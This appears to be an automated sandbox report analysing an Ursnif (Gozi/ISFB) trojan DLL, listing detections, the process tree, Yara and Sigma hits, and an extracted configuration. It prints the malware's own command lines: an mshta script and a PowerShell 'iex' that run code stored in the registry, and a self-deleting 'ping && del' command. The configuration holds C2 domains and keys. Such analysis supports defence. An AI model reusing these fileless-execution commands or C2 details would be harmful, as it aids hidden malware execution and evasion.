Play interactive tour

Edit tour

Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name:	uT9rwkGATJ.dll
Analysis ID:	499264
MD5:	9a453cc31ebfca29d8df565258fbf8ce
SHA1:	5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256:	eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: Powershell run code from registry

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Sigma detected: Encoded IEX

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Writes or reads registry keys via WMI

Suspicious powershell command line found

Machine Learning detection for sample

Allocates memory in foreign processes

Uses ping.exe to check the status of other devices and networks

Modifies the prolog of user mode functions (user mode inline hooks)

Self deletion via cmd delete

Sigma detected: MSHTA Spawning Windows Shell

Uses ping.exe to sleep

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Sigma detected: Suspicious Csc.exe Source File Folder

Disables SPDY (HTTP compression, likely to perform web injects)

Modifies the export address table of user mode modules (user mode EAT hooks)

Writes registry values via WMI

Modifies the import address table of user mode modules (user mode IAT hooks)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sigma detected: Suspicious Rundll32 Activity

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6424 cmdline: loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6392 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6388 cmdline: rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

control.exe (PID: 3548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 6040 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6400 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

control.exe (PID: 4000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 6504 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

mshta.exe (PID: 6856 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6972 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 1304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5452 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 3912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 4452 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

cmd.exe (PID: 1460 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6372 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

mshta.exe (PID: 5772 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5480 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 344 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 3380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5640 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6388	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3352	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4084	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.b00000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.4a794a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.96a309.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.13494a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.4a794a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.6aa309.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.13494a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.50394a0.8.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.50394a0.8.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.3020000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.3.rundll32.exe.2f7a309.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.3.rundll32.exe.2f7a309.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.96a309.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.69a309.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.69a309.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.6aa309.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6e1a0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.300a309.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.2bd0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.300a309.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', ProcessId: 1304

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4000, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6504

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132781743762523748.6972.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Machine Learning detection for sample

Show sources

Source: uT9rwkGATJ.dll

Joe Sandbox ML: detected

Source: uT9rwkGATJ.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown	HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2

Source: uT9rwkGATJ.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source:	Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_00B6B4A5
